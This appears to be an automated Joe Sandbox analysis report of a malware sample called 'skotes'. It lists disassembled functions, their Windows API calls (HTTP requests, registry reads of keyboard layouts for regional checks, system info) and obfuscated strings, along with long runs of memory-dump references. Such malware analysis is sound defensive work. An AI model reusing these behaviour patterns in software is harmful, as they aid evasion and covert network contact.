Instruction Fuzzy Hash: 4EF20A71A10148DBEF18DF38CD8979DBB72AB81304F548198E449973D7EB3D9E848B92

Function 0073BE30 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 313
networkfilesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000005DC,3EB2933D,?,00000000), ref: 0073BEB8
InternetOpenW.WININET(00788DC8,00000000,00000000,00000000,00000000), ref: 0073BEC8
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0073BEEC
HttpOpenRequestA.WININET(?,00000000), ref: 0073BF36
HttpSendRequestA.WININET(?,00000000), ref: 0073BFF6
InternetReadFile.WININET(?,?,000003FF,?), ref: 0073C0A8
InternetReadFile.WININET(?,00000000,000003FF,?,?,00000000,?,?), ref: 0073C161
InternetCloseHandle.WININET(?), ref: 0073C187
InternetCloseHandle.WININET(?), ref: 0073C18F
InternetCloseHandle.WININET(?), ref: 0073C197

Strings

RE1NXF==, xrefs: 0073BF0E
8HJUeMD Lq5=, xrefs: 0073C465
stoi argument out of range, xrefs: 0073E4EA
8HJUeIfzLo==, xrefs: 0073C3CB, 0073C623
invalid stoi argument, xrefs: 0073E4F4

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendSleep
String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$invalid stoi argument$stoi argument out of range
API String ID: 1439999335-885246636
Opcode ID: df25427ae0dfe4c55f1db01169c169f8acd1d0e35e4bdca456711285e86e4774
Instruction ID: 73917037d43311dc5229ef0efcbd3af6fd96daf15e8322efb529fb4d30e0479d
Opcode Fuzzy Hash: df25427ae0dfe4c55f1db01169c169f8acd1d0e35e4bdca456711285e86e4774
Instruction Fuzzy Hash: 7EB105B1600118DBEB29DF28CC89B9E7B75EF45304F508199F509A72C3DB399AC0CB95

Function 00736020 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 275
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0073617D
RegEnumValueA.KERNEL32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00736271

Strings

0000043f, xrefs: 0073612B
00000422, xrefs: 007360C9
Keyboard Layout\Preload, xrefs: 00736054
00000423, xrefs: 007360FA
00000419, xrefs: 00736098

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: EnumOpenValue
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 2571532894-3963862150
Opcode ID: 4445af89725b594625c07e757d9bdf783dfe19b7728f26460bb0a4f0c67f4857
Instruction ID: b0d7141b05a13774cd72f4f81ccc09449d15f94a2c2351d06fed4207352d8ee8
Opcode Fuzzy Hash: 4445af89725b594625c07e757d9bdf783dfe19b7728f26460bb0a4f0c67f4857
Instruction Fuzzy Hash: E9B1C271900168EBEB25DB54CC88BDEB779EF04340F5442E8E508E7292DB789FA88F55

Function 00737D30 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00737ED3

Strings

JjssOl==, xrefs: 0073813A
JjssPV==, xrefs: 007381E2
JjsrQV==, xrefs: 00738092
JjsrPl==, xrefs: 0073828A

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
API String ID: 1721193555-3123340372
Opcode ID: 1737d1593d0233439328adf6adb5d5c0ee19121dfac59d8e22412f91b33fe0e9
Instruction ID: c741c258686b532d2b8a7dbdeb95339e871ab4be9f194c35d2db3a5e54bfbc37
Opcode Fuzzy Hash: 1737d1593d0233439328adf6adb5d5c0ee19121dfac59d8e22412f91b33fe0e9
Instruction Fuzzy Hash: DAE1E5B1E00644EBEB28BB28DC4B39D7A61AB41724F944688E415673C3DB3D5F818BD3

Function 00771ABC Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00771775: CreateFileW.KERNEL32(00000000,00000000,?,00771B65,?,?,00000000,?,00771B65,00000000,0000000C), ref: 00771792

__dosmaperr.LIBCMT ref: 00771BD7
GetFileType.KERNEL32(00000000), ref: 00771BE3
__dosmaperr.LIBCMT ref: 00771BF6
__dosmaperr.LIBCMT ref: 00771D9C

Strings

H, xrefs: 00771D21

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: __dosmaperr$File$CreateType
String ID: H
API String ID: 3443242726-2852464175
Opcode ID: 203685cfa1c8966bd1eb74607e9335ed62f8b78d5c87235c2388655b0e283087
Instruction ID: c99b34952bd8b3ab418c53079e690b51a11828a3de5cf036de4f2d6d7fb821fd
Opcode Fuzzy Hash: 203685cfa1c8966bd1eb74607e9335ed62f8b78d5c87235c2388655b0e283087
Instruction Fuzzy Hash: 04A11832A141488FCF19DF6CCC91BAD3BA1DB06364F14829AEC16AF2D1D6399D16CB61

Function 007726F2 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00786758), ref: 0077275C

Strings

Eastern Summer Time, xrefs: 007727FA
Xgx, xrefs: 00772705, 0077270B
Eastern Standard Time, xrefs: 007727CB

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
